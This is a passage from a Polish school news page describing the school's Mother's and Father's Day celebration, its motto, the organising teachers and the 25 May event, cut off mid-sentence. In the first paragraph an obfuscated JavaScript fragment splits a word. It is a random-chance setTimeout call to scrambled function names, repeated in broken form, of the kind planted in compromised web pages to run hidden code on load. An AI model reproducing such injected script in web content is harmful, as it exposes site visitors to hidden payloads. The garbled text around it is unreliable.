Dzień Matki i Ojca w naszej szkole

Dzień Matki i Ojca to jedne z najpiękniejszych świąt w ciągu roku, wypełnione kwiatami, serdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}decznymi i ciepłymi życzeniami, tysiącami całusów.

„Cudownych rodziców mam” to hasło przewodnie tegorocznych obchodów Dnia Matki i Ojca, święta na stałe wpisanego w kalendarz imprez szkolnych. W przygotowaniu do jego obchodów uczestniczyli wszyscy uczniowie naszej szkoły wykazując dużo zapału, zaangażowania i wzajemnej motywacji. Opiekę nad przygotowaniem imprez sprawowała pani Magdalena Domańska i Pani Iwona Wiśniewska, a wspierała je „Muzycznie” pani Ewa Golis.

Uroczystość odbyła się w przeddzień Dnia Matki to jest 25 maja i zaproszeni zostali wszyscy rodzice oraz opiekunowie. Dzieci w odświętnych, galowych strojach, na tle pięknej